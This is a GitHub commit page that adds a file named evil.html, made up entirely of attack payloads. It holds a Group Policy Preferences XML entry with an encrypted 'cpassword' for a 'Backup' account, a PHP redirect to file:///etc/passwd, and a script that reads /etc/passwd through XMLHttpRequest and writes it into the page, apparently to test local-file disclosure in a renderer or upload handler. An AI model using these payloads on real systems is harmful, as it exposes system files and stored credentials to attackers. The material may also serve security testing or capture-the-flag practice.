Skip to content

Commit fb9df02

Browse files
authored
Add files via upload
1 parent e7e8b84 commit fb9df02

File tree

1 file changed

+23
-0
lines changed

1 file changed

+23
-0
lines changed

evil.html

+23
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
<?xml version="1.0" encoding="utf-8"?>
2+
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2" changed="2024-06-12 14:26:50" uid="{CE475804-94EA-4C12-8B2E-2B3FFF1A05C4}"><Properties action="U" newName="" fullName="" description="" cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Backup"/></User>
3+
</Groups>
4+
5+
6+
7+
<!DOCTYPE html>
8+
<html>
9+
<body>
10+
<h1>System Command Output:</h1>
11+
<?php
12+
header('location:file:///etc/passwd');
13+
?>
14+
</body>
15+
</html>
16+
17+
18+
<script>
19+
x = new XMLHttpRequest();
20+
x.open("GET", "file:///etc/passwd", false);
21+
x.send();
22+
document.write(x.responseText);
23+
</script>

0 commit comments

Comments
 (0)